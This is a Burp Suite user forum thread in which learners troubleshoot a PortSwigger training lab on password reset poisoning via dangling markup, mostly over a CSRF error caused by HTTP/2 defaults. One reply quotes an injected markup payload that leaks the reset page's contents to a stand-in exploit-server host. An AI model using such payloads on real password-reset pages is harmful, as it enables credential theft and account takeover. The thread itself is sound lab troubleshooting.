Burp Suite User Forum


Password reset poisoning via dangling markup

Dark | Last updated: Jun 05, 2021 12:43PM UTC

In step 5 they always show me that the CSRF token is invalid. Even if I follow the video tutorial, the thing is the same. So help me to solve the lab.

Uthman, PortSwigger Agent | Last updated: Jun 07, 2021 10:12AM UTC

Thanks for reporting this. We have checked the lab and it appears to be functioning without any issues. Can you double-check that you are sending the correct request to the Repeater? If you believe there could be a bug, please email support@portswigger.net with a screen recording of your attempt.

Nstderr | Last updated: Apr 09, 2023 09:28PM UTC

I'm not sure how you determined it functions without issues, since the issue is with Burp and its default settings. For anyone else that's having this "Parameter missing: 'csrf'" issue, it's due to Burp automatically changing the protocol to HTTP/2. If this is disabled in settings (Network>settings>http>uncheck "Default to HTTP/2 if the server supports it"), the csrf error is fixed.

Ben, PortSwigger Agent | Last updated: Apr 10, 2023 08:41AM UTC

Hi, just to clarify, the initial response to this forum thread was made nearly two years ago, prior to the labs supporting HTTP/2. In terms of the current issues with the lab - we are in the process of updating our instructions, where necessary, in order for them to still be relevant now that the labs do support HTTP/2. This looks like it is a lab that we need to address so we will discuss this with the wider team.

werthergotguns | Last updated: Sep 07, 2023 02:06PM UTC

There is a bug in the lab; you can solve it by enforcing the use of the HTTP 1.1 protocol in the proxy, before passing the request to Repeater. Also, the payload in the lab solution doesn't work. This is the correct one: :'><a href="//exploit-TOKEN.exploit-server.net/?

Ben, PortSwigger Agent | Last updated: Sep 07, 2023 05:06PM UTC

Hi, you should be able to solve this lab without changing the protocol to HTTP/2 by using Burp version 2023.10 or above (this is currently an early adopter release). I have just run through this lab and the written solution, including the suggested payload, still works and allows you to retrieve the password from the access log. Are you able to share further details with regards to why you believe this does not work?
